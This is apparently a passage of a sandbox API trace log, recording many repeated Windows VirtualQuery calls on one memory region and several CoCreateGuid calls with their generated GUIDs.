	[0088.964] VirtualQuery (in: lpAddress=0x14d440, lpBuffer=0x14e440, dwLength=0x1c | out: lpBuffer=0x14e440*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.964] VirtualQuery (in: lpAddress=0x14d3d8, lpBuffer=0x14e3d8, dwLength=0x1c | out: lpBuffer=0x14e3d8*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.964] VirtualQuery (in: lpAddress=0x14d414, lpBuffer=0x14e414, dwLength=0x1c | out: lpBuffer=0x14e414*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.965] VirtualQuery (in: lpAddress=0x14d3d8, lpBuffer=0x14e3d8, dwLength=0x1c | out: lpBuffer=0x14e3d8*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.965] VirtualQuery (in: lpAddress=0x14d414, lpBuffer=0x14e414, dwLength=0x1c | out: lpBuffer=0x14e414*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.965] VirtualQuery (in: lpAddress=0x14d414, lpBuffer=0x14e414, dwLength=0x1c | out: lpBuffer=0x14e414*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.965] VirtualQuery (in: lpAddress=0x14d3d8, lpBuffer=0x14e3d8, dwLength=0x1c | out: lpBuffer=0x14e3d8*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.965] VirtualQuery (in: lpAddress=0x14d414, lpBuffer=0x14e414, dwLength=0x1c | out: lpBuffer=0x14e414*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.965] VirtualQuery (in: lpAddress=0x14d3d8, lpBuffer=0x14e3d8, dwLength=0x1c | out: lpBuffer=0x14e3d8*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.966] VirtualQuery (in: lpAddress=0x14d414, lpBuffer=0x14e414, dwLength=0x1c | out: lpBuffer=0x14e414*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.966] VirtualQuery (in: lpAddress=0x14d3d8, lpBuffer=0x14e3d8, dwLength=0x1c | out: lpBuffer=0x14e3d8*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.966] VirtualQuery (in: lpAddress=0x14d414, lpBuffer=0x14e414, dwLength=0x1c | out: lpBuffer=0x14e414*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.966] VirtualQuery (in: lpAddress=0x14d27c, lpBuffer=0x14e27c, dwLength=0x1c | out: lpBuffer=0x14e27c*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.967] VirtualQuery (in: lpAddress=0x14d3d8, lpBuffer=0x14e3d8, dwLength=0x1c | out: lpBuffer=0x14e3d8*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.968] VirtualQuery (in: lpAddress=0x14d414, lpBuffer=0x14e414, dwLength=0x1c | out: lpBuffer=0x14e414*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.968] VirtualQuery (in: lpAddress=0x14d3d8, lpBuffer=0x14e3d8, dwLength=0x1c | out: lpBuffer=0x14e3d8*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.968] VirtualQuery (in: lpAddress=0x14d414, lpBuffer=0x14e414, dwLength=0x1c | out: lpBuffer=0x14e414*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.968] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0x6d1b8e7, Data2=0x7d3f, Data3=0x44b9, Data4=([0]=0x88, [1]=0x55, [2]=0xfe, [3]=0xd6, [4]=0xfc, [5]=0xcb, [6]=0x16, [7]=0xf3))) returned 0x0
	[0088.969] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0xa9eb73f5, Data2=0x180d, Data3=0x4c88, Data4=([0]=0x90, [1]=0x4e, [2]=0x27, [3]=0x4e, [4]=0x1c, [5]=0xdf, [6]=0x22, [7]=0xf1))) returned 0x0
	[0088.970] VirtualQuery (in: lpAddress=0x14d034, lpBuffer=0x14e034, dwLength=0x1c | out: lpBuffer=0x14e034*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.971] VirtualQuery (in: lpAddress=0x14d034, lpBuffer=0x14e034, dwLength=0x1c | out: lpBuffer=0x14e034*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.971] VirtualQuery (in: lpAddress=0x14d070, lpBuffer=0x14e070, dwLength=0x1c | out: lpBuffer=0x14e070*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.971] VirtualQuery (in: lpAddress=0x14d034, lpBuffer=0x14e034, dwLength=0x1c | out: lpBuffer=0x14e034*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.971] VirtualQuery (in: lpAddress=0x14d070, lpBuffer=0x14e070, dwLength=0x1c | out: lpBuffer=0x14e070*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.972] VirtualQuery (in: lpAddress=0x14d034, lpBuffer=0x14e034, dwLength=0x1c | out: lpBuffer=0x14e034*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.972] VirtualQuery (in: lpAddress=0x14d070, lpBuffer=0x14e070, dwLength=0x1c | out: lpBuffer=0x14e070*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.973] VirtualQuery (in: lpAddress=0x14d034, lpBuffer=0x14e034, dwLength=0x1c | out: lpBuffer=0x14e034*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.973] VirtualQuery (in: lpAddress=0x14d070, lpBuffer=0x14e070, dwLength=0x1c | out: lpBuffer=0x14e070*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.973] VirtualQuery (in: lpAddress=0x14d034, lpBuffer=0x14e034, dwLength=0x1c | out: lpBuffer=0x14e034*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.974] VirtualQuery (in: lpAddress=0x14d070, lpBuffer=0x14e070, dwLength=0x1c | out: lpBuffer=0x14e070*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.974] VirtualQuery (in: lpAddress=0x14d034, lpBuffer=0x14e034, dwLength=0x1c | out: lpBuffer=0x14e034*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.974] VirtualQuery (in: lpAddress=0x14d070, lpBuffer=0x14e070, dwLength=0x1c | out: lpBuffer=0x14e070*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.975] VirtualQuery (in: lpAddress=0x14d4a4, lpBuffer=0x14e4a4, dwLength=0x1c | out: lpBuffer=0x14e4a4*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.976] VirtualQuery (in: lpAddress=0x14d4a4, lpBuffer=0x14e4a4, dwLength=0x1c | out: lpBuffer=0x14e4a4*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.977] VirtualQuery (in: lpAddress=0x14d4a4, lpBuffer=0x14e4a4, dwLength=0x1c | out: lpBuffer=0x14e4a4*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.978] VirtualQuery (in: lpAddress=0x14d4a4, lpBuffer=0x14e4a4, dwLength=0x1c | out: lpBuffer=0x14e4a4*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.979] VirtualQuery (in: lpAddress=0x14d0d4, lpBuffer=0x14e0d4, dwLength=0x1c | out: lpBuffer=0x14e0d4*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.979] VirtualQuery (in: lpAddress=0x14d110, lpBuffer=0x14e110, dwLength=0x1c | out: lpBuffer=0x14e110*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.979] VirtualQuery (in: lpAddress=0x14d3d8, lpBuffer=0x14e3d8, dwLength=0x1c | out: lpBuffer=0x14e3d8*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.979] VirtualQuery (in: lpAddress=0x14d414, lpBuffer=0x14e414, dwLength=0x1c | out: lpBuffer=0x14e414*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.980] VirtualQuery (in: lpAddress=0x14d3d8, lpBuffer=0x14e3d8, dwLength=0x1c | out: lpBuffer=0x14e3d8*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.980] VirtualQuery (in: lpAddress=0x14d414, lpBuffer=0x14e414, dwLength=0x1c | out: lpBuffer=0x14e414*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.981] VirtualQuery (in: lpAddress=0x14d414, lpBuffer=0x14e414, dwLength=0x1c | out: lpBuffer=0x14e414*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.981] VirtualQuery (in: lpAddress=0x14d3d8, lpBuffer=0x14e3d8, dwLength=0x1c | out: lpBuffer=0x14e3d8*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.981] VirtualQuery (in: lpAddress=0x14d414, lpBuffer=0x14e414, dwLength=0x1c | out: lpBuffer=0x14e414*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.981] VirtualQuery (in: lpAddress=0x14d3d8, lpBuffer=0x14e3d8, dwLength=0x1c | out: lpBuffer=0x14e3d8*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.981] VirtualQuery (in: lpAddress=0x14d414, lpBuffer=0x14e414, dwLength=0x1c | out: lpBuffer=0x14e414*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.982] VirtualQuery (in: lpAddress=0x14d3d8, lpBuffer=0x14e3d8, dwLength=0x1c | out: lpBuffer=0x14e3d8*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.983] VirtualQuery (in: lpAddress=0x14d414, lpBuffer=0x14e414, dwLength=0x1c | out: lpBuffer=0x14e414*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.983] VirtualQuery (in: lpAddress=0x14d27c, lpBuffer=0x14e27c, dwLength=0x1c | out: lpBuffer=0x14e27c*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.983] VirtualQuery (in: lpAddress=0x14d3d8, lpBuffer=0x14e3d8, dwLength=0x1c | out: lpBuffer=0x14e3d8*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.984] VirtualQuery (in: lpAddress=0x14d414, lpBuffer=0x14e414, dwLength=0x1c | out: lpBuffer=0x14e414*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.984] VirtualQuery (in: lpAddress=0x14d3d8, lpBuffer=0x14e3d8, dwLength=0x1c | out: lpBuffer=0x14e3d8*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.984] VirtualQuery (in: lpAddress=0x14d414, lpBuffer=0x14e414, dwLength=0x1c | out: lpBuffer=0x14e414*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.985] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0x920e81ca, Data2=0xb28f, Data3=0x4945, Data4=([0]=0x91, [1]=0x53, [2]=0xc7, [3]=0x85, [4]=0x1b, [5]=0x6d, [6]=0xd1, [7]=0xfc))) returned 0x0
	[0088.986] VirtualQuery (in: lpAddress=0x14d0d4, lpBuffer=0x14e0d4, dwLength=0x1c | out: lpBuffer=0x14e0d4*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.986] VirtualQuery (in: lpAddress=0x14d110, lpBuffer=0x14e110, dwLength=0x1c | out: lpBuffer=0x14e110*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.987] VirtualQuery (in: lpAddress=0x14d1dc, lpBuffer=0x14e1dc, dwLength=0x1c | out: lpBuffer=0x14e1dc*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.988] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0x809626f1, Data2=0xc335, Data3=0x4e30, Data4=([0]=0xbd, [1]=0x27, [2]=0xcb, [3]=0x8d, [4]=0x4c, [5]=0xbd, [6]=0x80, [7]=0x54))) returned 0x0
	[0088.988] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0x626a3245, Data2=0x1a1a, Data3=0x4ec3, Data4=([0]=0xa3, [1]=0xfe, [2]=0xda, [3]=0x17, [4]=0xf2, [5]=0xcf, [6]=0xb5, [7]=0x18))) returned 0x0
	[0088.989] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0x46ac4b2b, Data2=0xb9bd, Data3=0x4e8d, Data4=([0]=0xa5, [1]=0x63, [2]=0x19, [3]=0x69, [4]=0xa3, [5]=0x94, [6]=0xd6, [7]=0xbb))) returned 0x0
	[0088.990] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0xf3aa8d27, Data2=0x18e8, Data3=0x40d2, Data4=([0]=0xb2, [1]=0x4b, [2]=0xc, [3]=0xa, [4]=0xb3, [5]=0x77, [6]=0x87, [7]=0x47))) returned 0x0
	[0088.990] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0xd0e086b6, Data2=0x444d, Data3=0x4501, Data4=([0]=0x9a, [1]=0xe0, [2]=0x29, [3]=0xcc, [4]=0x72, [5]=0x9f, [6]=0x3d, [7]=0x21))) returned 0x0
	[0088.990] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0x86c5848a, Data2=0xafb6, Data3=0x4886, Data4=([0]=0xa4, [1]=0x40, [2]=0xff, [3]=0xec, [4]=0xdd, [5]=0xb5, [6]=0x0, [7]=0x39))) returned 0x0
	[0088.991] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0x5169b4c9, Data2=0x549c, Data3=0x475a, Data4=([0]=0x97, [1]=0xe4, [2]=0x8e, [3]=0x90, [4]=0xa, [5]=0x39, [6]=0x79, [7]=0xa9))) returned 0x0
	[0088.991] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0x4ad28fa9, Data2=0x9830, Data3=0x46e2, Data4=([0]=0x87, [1]=0x9a, [2]=0xf9, [3]=0xc0, [4]=0x63, [5]=0x3, [6]=0xaf, [7]=0x52))) returned 0x0
	[0088.992] VirtualQuery (in: lpAddress=0x14d034, lpBuffer=0x14e034, dwLength=0x1c | out: lpBuffer=0x14e034*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.992] VirtualQuery (in: lpAddress=0x14d034, lpBuffer=0x14e034, dwLength=0x1c | out: lpBuffer=0x14e034*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.992] VirtualQuery (in: lpAddress=0x14d070, lpBuffer=0x14e070, dwLength=0x1c | out: lpBuffer=0x14e070*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.992] VirtualQuery (in: lpAddress=0x14d034, lpBuffer=0x14e034, dwLength=0x1c | out: lpBuffer=0x14e034*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.993] VirtualQuery (in: lpAddress=0x14d070, lpBuffer=0x14e070, dwLength=0x1c | out: lpBuffer=0x14e070*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.993] VirtualQuery (in: lpAddress=0x14d034, lpBuffer=0x14e034, dwLength=0x1c | out: lpBuffer=0x14e034*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.994] VirtualQuery (in: lpAddress=0x14d070, lpBuffer=0x14e070, dwLength=0x1c | out: lpBuffer=0x14e070*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.994] VirtualQuery (in: lpAddress=0x14d034, lpBuffer=0x14e034, dwLength=0x1c | out: lpBuffer=0x14e034*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.994] VirtualQuery (in: lpAddress=0x14d070, lpBuffer=0x14e070, dwLength=0x1c | out: lpBuffer=0x14e070*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.995] VirtualQuery (in: lpAddress=0x14d034, lpBuffer=0x14e034, dwLength=0x1c | out: lpBuffer=0x14e034*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.995] VirtualQuery (in: lpAddress=0x14d070, lpBuffer=0x14e070, dwLength=0x1c | out: lpBuffer=0x14e070*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.995] VirtualQuery (in: lpAddress=0x14d034, lpBuffer=0x14e034, dwLength=0x1c | out: lpBuffer=0x14e034*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.996] VirtualQuery (in: lpAddress=0x14d070, lpBuffer=0x14e070, dwLength=0x1c | out: lpBuffer=0x14e070*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.997] VirtualQuery (in: lpAddress=0x14d3d8, lpBuffer=0x14e3d8, dwLength=0x1c | out: lpBuffer=0x14e3d8*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.997] VirtualQuery (in: lpAddress=0x14d414, lpBuffer=0x14e414, dwLength=0x1c | out: lpBuffer=0x14e414*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.997] VirtualQuery (in: lpAddress=0x14d3d8, lpBuffer=0x14e3d8, dwLength=0x1c | out: lpBuffer=0x14e3d8*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.998] VirtualQuery (in: lpAddress=0x14d414, lpBuffer=0x14e414, dwLength=0x1c | out: lpBuffer=0x14e414*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.998] VirtualQuery (in: lpAddress=0x14d414, lpBuffer=0x14e414, dwLength=0x1c | out: lpBuffer=0x14e414*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.998] VirtualQuery (in: lpAddress=0x14d3d8, lpBuffer=0x14e3d8, dwLength=0x1c | out: lpBuffer=0x14e3d8*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.999] VirtualQuery (in: lpAddress=0x14d414, lpBuffer=0x14e414, dwLength=0x1c | out: lpBuffer=0x14e414*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0088.999] CoCreateGuid (in: pguid=0x14e788 | out: pguid=0x14e788*(Data1=0x199bb656, Data2=0x61f5, Data3=0x4fa1, Data4=([0]=0xbd, [1]=0x78, [2]=0xa9, [3]=0x39, [4]=0x3d, [5]=0xe1, [6]=0x44, [7]=0x45))) returned 0x0
	[0088.999] VirtualQuery (in: lpAddress=0x14d404, lpBuffer=0x14e404, dwLength=0x1c | out: lpBuffer=0x14e404*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0089.000] VirtualQuery (in: lpAddress=0x14d404, lpBuffer=0x14e404, dwLength=0x1c | out: lpBuffer=0x14e404*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0089.000] VirtualQuery (in: lpAddress=0x14d440, lpBuffer=0x14e440, dwLength=0x1c | out: lpBuffer=0x14e440*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0089.000] VirtualQuery (in: lpAddress=0x14d404, lpBuffer=0x14e404, dwLength=0x1c | out: lpBuffer=0x14e404*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0089.001] VirtualQuery (in: lpAddress=0x14d440, lpBuffer=0x14e440, dwLength=0x1c | out: lpBuffer=0x14e440*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0089.001] VirtualQuery (in: lpAddress=0x14d404, lpBuffer=0x14e404, dwLength=0x1c | out: lpBuffer=0x14e404*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0089.001] VirtualQuery (in: lpAddress=0x14d440, lpBuffer=0x14e440, dwLength=0x1c | out: lpBuffer=0x14e440*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0089.002] VirtualQuery (in: lpAddress=0x14d404, lpBuffer=0x14e404, dwLength=0x1c | out: lpBuffer=0x14e404*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0089.002] VirtualQuery (in: lpAddress=0x14d440, lpBuffer=0x14e440, dwLength=0x1c | out: lpBuffer=0x14e440*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0089.003] VirtualQuery (in: lpAddress=0x14d404, lpBuffer=0x14e404, dwLength=0x1c | out: lpBuffer=0x14e404*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0089.003] VirtualQuery (in: lpAddress=0x14d440, lpBuffer=0x14e440, dwLength=0x1c | out: lpBuffer=0x14e440*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0089.003] VirtualQuery (in: lpAddress=0x14d404, lpBuffer=0x14e404, dwLength=0x1c | out: lpBuffer=0x14e404*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
